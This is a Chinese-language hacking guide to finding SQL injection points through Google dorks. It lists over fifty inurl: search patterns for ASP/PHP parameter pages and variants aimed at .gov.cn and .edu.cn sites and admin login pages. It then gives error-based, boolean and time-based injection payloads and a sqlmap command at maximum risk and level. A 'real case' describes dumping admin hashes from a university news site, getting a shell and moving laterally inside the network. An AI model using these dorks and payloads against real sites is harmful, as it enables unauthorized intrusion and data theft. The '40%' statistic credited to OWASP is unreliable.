一、前言:为什么 SQL 注入仍是"永恒之神"?
尽管 WAF、参数化查询、ORM 框架已普及,但 2025 年的网络空间中仍有超过 40% 的 Web 应用存在可利用的 SQL 注入 (来源:OWASP Top 10 历史数据趋势)。
原因很简单:
- 老旧系统未升级(ASP/ASP.NET/PHP 遗留代码)
- 开发者直接拼接 SQL(如
SELECT * FROM news WHERE id = $_GET['id']) - 第三方组件、定制模块未打补丁
而 Google Dork(谷歌黑客语法) 正是发现这些"沉睡漏洞"的最快途径之一。
二、核心武器:inurl: + 高危参数组合
inurl: 语法可强制搜索 URL 路径中包含特定字符串 的页面,通常这些页面是动态脚本,直接接收用户输入。
本文整理 50+ 条经实战验证的高危 Google Dork ,专用于挖掘 经典 ASP/ASP.NET/PHP 系统中潜在 SQL 注入点。
三、终极 Dork 列表
使用方法:在 Google 搜索框直接输入以下语句(需登录 Google 账号避免限流)
dork
inurl:/search_results.php search=
inurl:'Product.asp?BigClassName
inurl:Article_Print.asp?
inurl:NewsInfo.asp?id=
inurl:EnCompHonorBig.asp?id=
inurl:ManageLogin.asp
inurl:Offer.php?idf=
inurl:Opinions.php?id=
inurl:Page.php?id=
inurl:Pop.php?id=
inurl:Post.php?id=
inurl:Prod_info.php?id=
inurl:Product-item.php?id=
inurl:Product.php?id=
inurl:Product_ranges_view.php?ID=
inurl:Productdetail.php?id=
inurl:Productinfo.php?id=
inurl:Produit.php?id=
inurl:Profile_view.php?id=
inurl:Publications.php?id=
inurl:Stray-Questions-View.php?num=
inurl:aboutbook.php?id=
inurl:ages.php?id=
inurl:announce.php?id=
inurl:art.php?idm=
inurl:article.php?ID=
inurl:asp?id=
inurl:avd_start.php?avd=
inurl:band_info.php?id=
inurl:buy.php?category=
inurl:category.php?id=
inurl:channel_id=
inurl:chappies.php?id=
inurl:clanek.php4?id=
inurl:clubpage.php?id=
inurl:collectionitem.php?id=
inurl:communique_detail.php?id=
inurl:curriculum.php?id=
inurl:declaration_more.php?decl_id=
inurl:detail.php?ID=
inurl:download.php?id=
inurl:downloads_info.php?id=
inurl:event.php?id=
inurl:faq2.php?id=
inurl:fellows.php?id=
inurl:fiche_spectacle.php?id=
inurl:forum_bds.php?num=
inurl:galeri_info.php?l=
inurl:gallery.php?id=
inurl:game.php?id=
inurl:games.php?id=
inurl:historialeer.php?num=
inurl:hosting_info.php?id=
inurl:humor.php?id=
四、Dork 分类解析
| 类型 | 典型特征 | 常见系统 |
|---|---|---|
id= |
最经典注入点 | ASP/ASP.NET/PHP |
?ID= |
大写常见于 .NET | C# WebForms |
num= |
常用于论坛/留言板 | PHP 自定义 CMS |
category= |
商品分类页 | 电商系统 |
search= |
搜索结果页 | 全站搜索模块 |
五、实战测试流程(授权渗透专用)
步骤 1:发现目标
dork
inurl:NewsInfo.asp?id= site:*.edu.cn -inurl:login
限定教育网,排除登录页,提升命中率
步骤 2:基础注入测试(错误回显型)
访问:
http://target.com/NewsInfo.asp?id=1'
观察是否出现:
Microsoft OLE DB Provider for ODBC Drivers errorSyntax error nearUnclosed quotation mark
步骤 3:布尔盲注验证
url
?id=1 AND 1=1 → 正常显示
?id=1 AND 1=2 → 页面异常/空白
步骤 4:时间盲注(绕过 WAF)
url
?id=1 AND (SELECT COUNT(*) FROM sysobjects)>0 WAITFOR DELAY '0:0:5'--
步骤 5:自动化验证(Burp Suite / sqlmap)
bash
sqlmap -u "http://target.com/NewsInfo.asp?id=1" --batch --risk=3 --level=5
六、高级技巧:组合语法提纯
| 目标 | 高级 Dork |
|---|---|
| 仅政府网站 | inurl:NewsInfo.asp?id= site:*.gov.cn |
| 排除跳转页 | inurl:article.php?ID= -inurl:redirect |
| 仅动态页面 | inurl:product.php?id= filetype:asp |
| 搜索后台 | inurl:ManageLogin.asp intitle:后台管理 |
七、真实战例复现(脱敏)
目标 :某高校新闻系统
Dork :inurl:NewsInfo.asp?id= site:edu.cn
发现 :http://news.xxx.edu.cn/NewsInfo.asp?id=1024
测试:
?id=1024' → 报错:Microsoft JET Database Engine error '80040e14'
利用:提取管理员哈希 → 后台 getShell → 内网横向